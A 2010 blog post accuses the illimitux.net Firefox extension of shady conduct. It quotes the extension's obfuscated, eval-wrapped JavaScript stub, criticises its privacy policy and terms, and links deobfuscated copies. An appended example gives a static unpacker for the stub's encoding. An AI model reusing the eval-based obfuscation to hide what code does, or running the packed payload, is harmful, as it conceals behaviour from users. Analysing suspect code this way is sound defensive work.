Seth Wisely said

April 18, 2010

illimitux.net firefox extension up to no good: evil intent inside

Filed under: CIO, interweb — Seth Wisely @ 19:21

Worse than malware?  It’s about the same.

Both of these files in the illimitux.net extension:

xpi: chrome\illimitux.jar\content\hoster.js
xpi: chrome\illimitux.jar\content\illimitux.js

employ JavaScript obfuscation.  Smells like malware.

eval((function(x){var d="";var p=0;while(p<x.length){if(x.charAt(p)!="`")d+=x.charAt(p++);else{var l=x.charCodeAt(p+3)-28;if(l>4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+="`";p+=4}}return d})

utf8_encode(argString`!^\"s` '!=` -&+\"\").replace(/\\r\\n/g,\"\\n` (*` ,$`%S!utftext`%_$start,end` '#ringl=0;` 3!=end` '!` 0\"` \"\"`\"s$for(var n=0;n<` =#;n++`!f\"c1` H$charCodeAt(n`!>\"enc=null;if(c1<128){end++`#F&c1>127&&c1<204` ;!c=`\"O\".fromC` n#(c1>>6|192)+` )2&63|128)` v\"` K912|224` Q4>>6` d$` j=if(enc!=`\"B!){` *!d>`#P!){`#|#+`\"y$sub` $\"(`$%%);}` =%enc`$$'n+1;}` z\"` HE`$L));`&z$` P#`&Q+convert(data`$e\"b64=\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=`&J\"o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc=\"\",tmp_arr=[];if(!`!I\"`!s#data;}data=`(C,data+\"\");do{o1=data`&V(i++);o2=` \"23` \"2bits=o1<<16|o2<<8|o3;h1=bits>>18&63;h2` '$2` *!3` (#6` )!4` )!&63;`\"0#[ac++]=b64`!)!At(h1)+` #(2)` \")3` 0*4);}while(i<`!o!`$u$enc=` }#.join(\"\");switch`\"w!` B#%3)

DANGER WILL ROBINSON

I cannot be bothered to de-obfuscate now.  That they employ such nefarious tactics in what ought to be a benign product is reason enough to NOT USE IT.  Their ‘contact us’ form is unusable... big surprise.

The extension lifts code from various userscript developers without attribution. Tsk tsk.

privacy? where?

“is accessible via http://www.illimitux.net or illimitux.com, for technical reasons” — ‘privacy’ policy

When did ignorance become a technical reason?

“In accordance with this Privacy Policy, we may use or disclose identifiable information other than those described herein without informing you or giving you the opportunity to consent to such amendments on the use and disclosure of your data.”

Why bother having a ‘privacy’ policy at all?

But wait there’s more… totally absurd TOS:

you warrant that:
– You are a physical person
– You will not use any ad blockers

What other kind of persons are there?  Not-use adblock?  Byte me!

“We can not control the use of our service by users.”

Yes, you can.

“Any exemption to above rules will be accompanied by a ban.”

Mmmm mighty fine Engrish.

ditch!

update: illimitux deobfuscated

illimitux.js deobfuscated: http://pastebin.com/RzYWNwbp
source md5: d91b5553107666ffadbffee16e6a9ffe

hoster.js deobfuscated: http://pastebin.com/A7uDmRDA
source md5: aa9685d48a14668176823cb887b67260
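
The stub quoted earlier is a small back-reference decompressor: a backtick opens a 4-character token whose last character encodes a copy length and whose middle two encode where in the already-decoded text to copy from. As an added example (not code from the original post or from the extension), the same loop can run as a plain function that returns the decoded source for review instead of handing it to eval; the `ref` helper and the sample string are constructed for illustration.

```javascript
// Added example: static unpacker for the backtick back-reference encoding.
// The decoded text is returned for review and is never passed to eval().
const MARK = "`";

// Token layout, read from the stub: MARK c1 c2 c3, with len = code(c3) - 28.
//   len > 4  : copy len chars that already sit in the output
//   len <= 4 : the token stands for one literal MARK
function unpack(packed) {
  let out = "";
  let p = 0;
  while (p < packed.length) {
    if (packed.charAt(p) !== MARK) { out += packed.charAt(p++); continue; }
    // Stricter than the stub, which would silently emit MARK on a cut-off token.
    if (p + 3 >= packed.length) throw new RangeError("truncated token at " + p);
    const len = packed.charCodeAt(p + 3) - 28;
    if (len > 4) {
      // Same arithmetic as the stub; 3104 = 32*96 + 32 removes the
      // printable-ASCII bias carried by c1 and c2.
      const start = out.length - packed.charCodeAt(p + 1) * 96
                  - packed.charCodeAt(p + 2) + 3104 - len;
      if (start < 0 || start + len > out.length) {
        throw new RangeError("back-reference outside decoded text at " + p);
      }
      out += out.slice(start, start + len);
    } else {
      out += MARK;
    }
    p += 4;
  }
  return out;
}

// Hypothetical helper (not the extension's packer): build one copy token.
// gap = chars between the end of the copied run and the end of the output.
function ref(gap, len) {
  return MARK + String.fromCharCode(32 + Math.floor(gap / 96), 32 + gap % 96, 28 + len);
}

// Constructed sample, not taken from the extension.
const SAMPLE = "function f(){return 1}" + ref(13, 9) + "g" + ref(10, 12);

console.log(unpack(SAMPLE));
```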
